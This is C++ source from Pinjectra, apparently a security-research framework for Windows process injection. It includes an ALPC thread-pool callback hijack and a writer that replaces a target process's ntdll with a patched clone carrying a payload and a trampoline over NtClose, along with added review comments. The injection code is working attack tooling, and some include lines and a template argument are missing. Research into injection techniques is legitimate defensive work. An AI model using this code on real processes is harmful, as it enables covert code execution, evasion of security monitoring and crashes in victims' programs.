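//   NTFUNC(NtQueryObject, "NtQueryObject", (HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG));
// declares the pointer type `tNtQueryObject` and a variable `NtQueryObject`
// initialised from GetProcAddress.
// The pointer type is NTAPI (__stdcall): ntdll exports use that convention,
// and on x86 a default-__cdecl pointer would call them with the wrong stack
// discipline (the solution has Win32 configurations). On x64 there is only
// one convention, so the change is a no-op there.
// The variable can be NULL if fname is not exported (typo, or a newer export
// on an older OS); callers must test `f` before calling through it.
#define NTFUNC(f,fname,def) typedef NTSTATUS (NTAPI * t##f) def;\
t##f f=(t##f)GetProcAddress(GetModuleHandleA("ntdll"),fname)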
50 |
51 | // Datatypes
// Information classes for NtQuerySystemInformation(). <winternl.h> only
// declares a documented handful, so this file carries the fuller (pre-Vista,
// up to 82) list of the kind found in public NT headers. The values are ABI:
// never renumber or reorder. Classes added in later Windows versions are
// simply absent.
// Only SystemHandleInformation (16) is backed by a structure in this file;
// see SYSTEM_HANDLE_INFORMATION below for its 16-bit handle-value caveat.
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1, // obsolete; kept so the numbering stays aligned
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,   // system-wide handle table, SYSTEM_HANDLE_INFORMATION (USHORT handle values)
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
    SystemEmulationProcessorInformation = 63,
    SystemExtendedHandleInformation = 64,   // same data as 16 with full-width handle values; no struct for it in this file
    SystemLostDelayedWriteInformation = 65,
    SystemBigPoolInformation = 66,
    SystemSessionPoolTagInformation = 67,
    SystemSessionMappedViewInformation = 68,
    SystemHotpatchInformation = 69,
    SystemObjectSecurityMode = 70,
    SystemWatchdogTimerHandler = 71,
    SystemWatchdogTimerInformation = 72,
    SystemLogicalProcessorInformation = 73,
    SystemWow64SharedInformation = 74,
    SystemRegisterFirmwareTableInformationHandler = 75,
    SystemFirmwareTableInformation = 76,
    SystemModuleInformationEx = 77,
    SystemVerifierTriageInformation = 78,
    SystemSuperfetchInformation = 79,
    SystemMemoryListInformation = 80,
    SystemFileCacheInformationEx = 81,
    MaxSystemInfoClass = 82 // MaxSystemInfoClass should always be the last enum

} SYSTEM_INFORMATION_CLASS;
139 |
// Information classes for NtQueryObject().
// NOTE(review): the second enumerator gets value 1, but in ntdll (and in
// <winternl.h>, which spells the values out) value 1 is ObjectNameInformation;
// ObjectTypeInformation is 2. This file declares OBJECT_NAME_INFORMATION and
// no type-information struct, so a caller passing ObjectTypeInformation is
// most likely relying on the *value* to obtain the object's name. The name is
// misleading rather than necessarily wrong: check the call sites in ALPC.cpp
// before renaming or renumbering, because fixing the number alone would
// silently change what the query returns.
typedef enum _OBJECT_INFORMATION_CLASS {
    ObjectBasicInformation,   // 0
    ObjectTypeInformation     // 1 -- see note above (this is ObjectNameInformation in ntdll)
} OBJECT_INFORMATION_CLASS;
144 |
// this structure is derived from TP_CALLBACK_ENVIRON_V3,
// but also includes two additional values. one to hold
// the callback function and the other is a callback parameter
//
// Every member is DWORD64, i.e. this is the 64-bit in-memory layout of the
// target's callback environment (the real TP_CALLBACK_ENVIRON_V3 members are
// pointer-sized). NOTE(review): the solution also has Win32 configurations;
// a 32-bit build looking at a 32-bit target would not line up with this
// layout, so confirm the ALPC technique is meant to be x64-only.
typedef struct _TP_CALLBACK_ENVIRONX {
    DWORD64 Version;
    DWORD64 Pool;
    DWORD64 CleanupGroup;
    DWORD64 CleanupGroupCancelCallback;
    DWORD64 RaceDll;
    DWORD64 ActivationContext;
    DWORD64 FinalizationCallback;
    DWORD64 Flags;
    DWORD64 CallbackPriority;
    DWORD64 Size;
    DWORD64 Callback;            // extra: function the pool will invoke
    DWORD64 CallbackParameter;   // extra: argument passed to Callback
} TP_CALLBACK_ENVIRONX, * PTP_CALLBACK_ENVIRONX;
162 |
// Kernel address of an object as reported in the system handle table. It is
// opaque to user mode: only ever compare it between entries, never
// dereference it.
typedef VOID* POBJECT;
164 |
// One entry of the SystemHandleInformation (class 16) table: a handle open in
// some process together with the kernel object it refers to.
// With natural alignment this is 16 bytes on x86 and 24 bytes on x64
// (pObject is 8-byte aligned), matching what the kernel writes.
typedef struct _SYSTEM_HANDLE {
    ULONG uIdProcess;           // id of the process owning the handle
    UCHAR ObjectType;           // object-type index; NOTE(review): not a fixed
                                // constant across Windows versions, so match
                                // on the type *name* where possible
    UCHAR Flags;                // HANDLE_FLAG_* (HANDLE_FLAG_INHERIT, etc.)
    USHORT Handle;              // handle value, which this class can only
                                // report in 16 bits; values above 0xFFFF do
                                // not fit (SystemExtendedHandleInformation
                                // returns them full-width)
    POBJECT pObject;            // kernel address, for matching entries only
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
173 |
// Buffer returned by NtQuerySystemInformation(SystemHandleInformation, ...).
// Handles[1] is the Windows-SDK style "one-element array" that actually runs
// for HandleCount entries past the header; indexing beyond [0] is intended.
// The call reports STATUS_INFO_LENGTH_MISMATCH when the buffer is too small,
// and the system-wide count changes between calls, so callers grow the buffer
// in a retry loop rather than sizing it once.
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG HandleCount;          // number of valid entries in Handles
    SYSTEM_HANDLE Handles[1];   // HandleCount entries follow (after alignment padding on x64)
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
179 |
// Counted UTF-16 string as used by the native API. Length and MaximumLength
// are in BYTES, not characters, and Buffer is not guaranteed to be
// NUL-terminated: bound every read by Length / sizeof(WCHAR) instead of
// calling wcslen() on Buffer.
// NOTE(review): this duplicates the definition in <winternl.h>; including
// both in one translation unit is a redefinition error.
typedef struct _UNICODE_STRING {
    USHORT Length;          // bytes in use, excluding any terminator
    USHORT MaximumLength;   // bytes available in Buffer
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
185 |
// Result of an NtQueryObject() name query. The struct is only the
// UNICODE_STRING header: the characters Name.Buffer points at are placed in
// the same caller-supplied buffer right after it, so that buffer must be
// larger than sizeof(OBJECT_NAME_INFORMATION) and Name.Buffer is only valid
// for as long as the buffer lives. An unnamed object typically comes back
// with Name.Length == 0 (Buffer may be NULL); check Length before using it.
typedef struct _OBJECT_NAME_INFORMATION
{
    UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
190 |
// Per-target state threaded through the CodeViaALPC helpers.
typedef struct
{
    HANDLE hp;                  // open handle to the target process
    std::vector ports;          // ALPC port names found in the target
                                // (presumably filled by GetALPCPorts()).
                                // NOTE(review): the template argument was
                                // lost in extraction; ALPC_Connect() takes a
                                // std::wstring, so this is presumably
                                // std::vector<std::wstring> -- confirm upstream.
    DWORD pid;                  // target process id
    BYTE* payload;              // bytes to write into the target
    DWORD64 payloadSize;        // length of payload in bytes
} process_info;
199 |
// The two members appended to TP_CALLBACK_ENVIRONX, as a standalone pair
// (same names and widths, so one can be copied to/from the other).
typedef struct _tp_param_t {
    DWORD64 Callback;            // function address
    DWORD64 CallbackParameter;   // argument handed to Callback
} tp_param;
204 |
205 | // Classes
// Execution technique built on the print-spooler/ALPC method described in the
// write-ups cited at the top of this file: find a thread-pool callback
// environment in the target, repoint its callback at the payload, then
// connect to one of the target's ALPC ports so the pool runs it. Writing the
// payload into the target is delegated to the AdvanceMemoryWriter passed in.
class CodeViaALPC :
    public ExecutionTechnique
{
public:
    // Constructor & Destructor
    // memwriter: writer used to place the payload; stored as a raw pointer.
    // NOTE(review): ownership is not expressed here -- check whether
    // ~CodeViaALPC() in ALPC.cpp deletes it before sharing one writer
    // between several techniques.
    CodeViaALPC(AdvanceMemoryWriter* memwriter)
        :m_memwriter(memwriter) { }
    ~CodeViaALPC();

    // Methods
    // Run the technique against process pid. tid is accepted for interface
    // parity with the other ExecutionTechnique implementations; whether it
    // is used is decided in ALPC.cpp. Return type is the rpcndr.h `boolean`
    // (an unsigned char alias), presumably non-zero on success.
    boolean inject(DWORD pid, DWORD tid);

private:
    // Methods
    // Sanity-check a candidate environ read from hProcess before trusting it.
    BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe);
    // Collect the ALPC ports belonging to pi->pid (presumably via the
    // system handle table declared above) into pi->ports.
    DWORD64 GetALPCPorts(process_info* pi);
    // Connect to the ALPC port named path, the action that triggers the
    // target's thread pool.
    BOOL ALPC_Connect(std::wstring path);
    // Write the payload and the patched environ cbe at ds in the target.
    BOOL ALPC_deploy(process_info* pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe);
    // Search one region of the target for a usable callback environment.
    BOOL FindCallback(process_info* pi, LPVOID BaseAddress, SIZE_T RegionSize);
    // Walk the target's address space region by region (see FindCallback).
    BOOL ScanProcess(process_info* pi);

protected:
    // Members
    AdvanceMemoryWriter* m_memwriter;   // ownership unclear; see constructor note

};
232 |
233 |
--------------------------------------------------------------------------------
/Pinjector/Adapters.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include "WritingTechniques.h"
32 |
33 | //////////////////////////////////////////
34 | // ComplexToAdvanceMemoryWriter Adapter //
35 | //////////////////////////////////////////
36 |
// Intentionally empty: the adapter only borrows m_payload and m_writer (both handed in by whoever
// constructed it). NOTE(review): confirm that owner releases them, otherwise this is a leak by design.
ComplexToMutableAdvanceMemoryWriter::~ComplexToMutableAdvanceMemoryWriter() {}
40 |
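// Evaluates the wrapped payload, pushes the resulting bytes into `target` through the wrapped
// AdvanceMemoryWriter, and returns the packet re-pointed at the REMOTE copy.
//
// Returns NULL if evaluation or the write fails (the original proceeded unconditionally and would
// dereference a NULL writer result). On success `payload_output->buffer` is an address inside the
// target process — it is not local memory and must not be freed or read by the caller.
//
// NOTE(review): the RUNTIME_MEM_ENTRY returned by writeto() is neither freed nor kept; its ownership
// is decided in AdvanceMemoryWriter (not visible here) — confirm whether the caller must free it.
PINJECTRA_PACKET* ComplexToMutableAdvanceMemoryWriter::eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params) {
    if (target == NULL)
        return NULL;

    // Evaluate the payload; it hands back a locally allocated buffer we will swap out below.
    PINJECTRA_PACKET* payload_output = this->m_payload->eval(params);
    if (payload_output == NULL || payload_output->buffer == NULL)
        return NULL;

    // Point the wrapped writer at the freshly evaluated bytes.
    this->m_writer->SetBuffer(payload_output->buffer);
    this->m_writer->SetBufferSize(payload_output->buffer_size);

    // Copy into the target.
    RUNTIME_MEM_ENTRY* writer_output = this->m_writer->writeto(target->process, 0);
    if (writer_output == NULL || writer_output->addr == NULL) {
        // Nothing reached the target: release the local copy rather than leak it, and report failure.
        free(payload_output->buffer);
        payload_output->buffer = NULL;
        payload_output->buffer_size = 0;
        return NULL;
    }

    // "Hijack" the packet: drop the local bytes and describe the remote copy instead.
    free(payload_output->buffer);
    payload_output->buffer = writer_output->addr;
    payload_output->buffer_size = writer_output->tot_write;

    return payload_output;
}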
62 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_NUVOS_NMVOS.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include
32 |
33 | #include
34 |
35 | #include "CFMA_MVOF_NUVOS_NMVOS.h"
36 |
37 | #include "ntapi.h"
38 |
// Resolved at run time from ntdll (see eval_and_write) so the binary has no import of the native API.
// File-local: the sibling writer in CFMA_MVOF_OP_PNMVOS.cpp keeps its own copy. Success is NT_SUCCESS,
// i.e. a non-negative NTSTATUS; callers must check it, the return value is not a BOOL.
static NTSTATUS(*PNtMapViewOfSection)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress, // in: requested base (or NULL); out: where the view was mapped
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize, // in/out: 0 = whole section
SECTION_INHERIT InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
51 |
// Resolved at run time alongside PNtMapViewOfSection. Second argument is the view's BASE ADDRESS in
// ProcessHandle (the cast at the call site misnames it as a handle; both are void* so it compiles).
static NTSTATUS(*PNtUnmapViewOfSection)(
HANDLE ProcessHandle,
PVOID BaseAddress);
55 |
56 | /////////////
57 | // Classes //
58 | /////////////
59 |
// Nothing to release here: m_dynamic_payload is borrowed, and the section/view created by
// eval_and_write are handled inside that call.
CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection::~CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection() {}
63 |
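// Technique: clone the target's copy of a system module into a pagefile-backed section, patch the clone
// (payload into a code cave, a trampoline over a function the target will call), then unmap the original
// module in the target and map the clone at the very same base. The target executes the payload the next
// time it enters the trampolined function; no WriteProcessMemory/VirtualProtectEx ever touches the target.
//
// Returns the evaluated packet on success, NULL on failure. Every fallible step is checked BEFORE the
// unmap: between NtUnmapViewOfSection and NtMapViewOfSection the target has no copy of the module at all,
// so a failure of the second call cannot be recovered from (the original checked nothing and could leave
// the target with a partially read clone, or with no module mapped).
PINJECTRA_PACKET* CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection::eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params)
{
    if (target == NULL || target->process == NULL)
        return NULL;
    HANDLE p = target->process;

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    PNtMapViewOfSection = (NTSTATUS(*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, SECTION_INHERIT, ULONG, ULONG))GetProcAddress(ntdll, "NtMapViewOfSection");
    PNtUnmapViewOfSection = (NTSTATUS(*)(HANDLE, PVOID))GetProcAddress(ntdll, "NtUnmapViewOfSection");
    if (PNtMapViewOfSection == NULL || PNtUnmapViewOfSection == NULL)
        return NULL;

    // Evaluate the payload; its metadata names the module to clone and where to patch it.
    PINJECTRA_PACKET* payload_output = this->m_dynamic_payload->eval(params);
    if (payload_output == NULL || payload_output->metadata == NULL || payload_output->buffer == NULL)
        return NULL;
    TStrDWORD64Map& tMetadata = *payload_output->metadata;
    void* target_cave = (void*)tMetadata["TARGET_CAVE"];     // where the payload bytes land inside the module
    void* target_fcn  = (void*)tMetadata["TARGET_FUNCTION"]; // function whose first bytes become the trampoline
    char* trampo      = (char*)tMetadata["TRAMPO"];          // trampoline bytes
    char* target_mod  = (char*)tMetadata["TARGET"];          // module name, e.g. "ntdll"
    if (target_cave == NULL || target_fcn == NULL || trampo == NULL || target_mod == NULL)
        return NULL;

    // The clone is mapped at OUR base of the module. This relies on system DLLs sharing one base across all
    // processes of a boot session (per-boot rather than per-process randomisation).
    char* mod_base = (char*)GetModuleHandleA(target_mod);
    MODULEINFO modinfo = { 0 };
    if (mod_base == NULL || !GetModuleInformation(GetCurrentProcess(), (HMODULE)mod_base, &modinfo, sizeof(modinfo)))
        return NULL;
    const SIZE_T size = modinfo.SizeOfImage;

    // Debug builds pin the layout this writer was developed against (original asserts, unchanged).
    assert(target_fcn == GetProcAddress(GetModuleHandleA("ntdll"), "NtClose"));
    assert(target_cave == GetProcAddress(GetModuleHandleA("ntdll"), "atan"));

    // Release builds have no asserts, so bounds-check both patch offsets against the image: a cave or function
    // address outside the module would otherwise make the memcpy calls below write past the local view.
    const SIZE_T kTrampolineSize = 12; // the original hard-coded 12 bytes for TRAMPO; assumed still accurate
    if ((char*)target_cave < mod_base || (char*)target_fcn < mod_base)
        return NULL;
    const SIZE_T cave_off = (SIZE_T)((char*)target_cave - mod_base);
    const SIZE_T fcn_off  = (SIZE_T)((char*)target_fcn - mod_base);
    if (cave_off > size || (SIZE_T)payload_output->buffer_size > size - cave_off ||
        fcn_off > size || kTrampolineSize > size - fcn_off)
        return NULL;

    HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, (DWORD)size, NULL);
    if (fm == NULL)
        return NULL;
    char* map_addr = (char*)MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (map_addr == NULL) {
        CloseHandle(fm);
        return NULL;
    }

    // Snapshot the module as the TARGET sees it (its relocations, IAT and any hooks), not our own copy.
    SIZE_T actually_read = 0;
    if (!ReadProcessMemory(p, mod_base, map_addr, size, &actually_read) || actually_read != size) {
        // An incomplete clone would replace the target's module with partially zeroed pages; stop here.
        printf("OOOPS: actually read: %llu, expecting %llu\n", (unsigned long long)actually_read, (unsigned long long)size);
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }

    // Patch the clone locally: payload into the cave, trampoline over the function prologue.
    memcpy(map_addr + cave_off, payload_output->buffer, (size_t)payload_output->buffer_size);
    memcpy(map_addr + fcn_off, trampo, kTrampolineSize);

    // ---- point of no return: from here until the clone is mapped, the target has no copy of the module ----
    LPVOID lpMap = mod_base;
    SIZE_T viewsize = 0;
    NTSTATUS status = (*PNtUnmapViewOfSection)(p, lpMap);
    if (status < 0) { // NT_SUCCESS is status >= 0
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }

    // "The default behavior for executable pages allocated is to be marked valid call targets for CFG."
    // (https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-mapviewoffile)
    status = (*PNtMapViewOfSection)(fm, p, &lpMap, 0, size, nullptr, &viewsize, ViewUnmap, 0, PAGE_EXECUTE_READWRITE);
    if (status < 0 || lpMap != (LPVOID)mod_base) {
        // The original module is already gone from the target; it will most likely crash on its next call into it.
        printf("OOOPS: NtMapViewOfSection failed with 0x%08lx; the target is probably unrecoverable\n", (unsigned long)status);
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }
    FlushInstructionCache(p, lpMap, size);

    // The remote view keeps the section alive, so our own view and handle can go instead of leaking per call.
    UnmapViewOfFile(map_addr);
    CloseHandle(fm);

    return payload_output;
}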
111 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_NUVOS_NMVOS.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | #define _CRT_SECURE_NO_WARNINGS
34 | #include
35 | #include
36 | #include
37 | #include
38 |
39 | #include "WritingTechniques.h"
40 |
41 | #include "ntapi.h"
42 |
43 | // Classes
// ComplexMemoryWriter that swaps a whole module in the target for a patched clone: the payload's metadata
// (TARGET, TARGET_CAVE, TARGET_FUNCTION, TRAMPO) says which module to clone and where to patch it, and
// eval_and_write does the unmap/remap dance. The name spells out the Win32/native call sequence used.
class CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection : public ComplexMemoryWriter
{
public:
    // The payload object is borrowed, not owned.
    CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection(DynamicPayload* dynamic_payload)
        : m_dynamic_payload(dynamic_payload) {}
    ~CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection();

    // Evaluates the payload with `params` and installs it into `target`; see the .cpp for failure semantics.
    PINJECTRA_PACKET* eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params);

protected:
    DynamicPayload* m_dynamic_payload; // produces the bytes and the patch metadata
};
61 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_OP_PNMVOS.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include
32 |
33 | #include "CFMA_MVOF_OP_PNMVOS.h"
34 |
35 | #include "ntapi.h"
36 |
// Resolved at run time from ntdll in write() so the binary carries no import of the native API.
// File-local copy; CFMA_MVOF_NUVOS_NMVOS.cpp declares its own. The result is an NTSTATUS — success is
// a non-negative value (NT_SUCCESS), not a BOOL — and must be checked by the caller.
static NTSTATUS(*PNtMapViewOfSection)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress, // in: requested base (NULL = let the kernel choose); out: actual base
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize, // in/out: 0 = whole section
SECTION_INHERIT InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
49 |
50 | /////////////
51 | // Classes //
52 | /////////////
53 |
// Nothing owned by the writer itself: m_buf is borrowed and the mapping/handles produced by write()
// belong to the RUNTIME_MEM_ENTRY it returns.
CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection::~CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection() {}
57 |
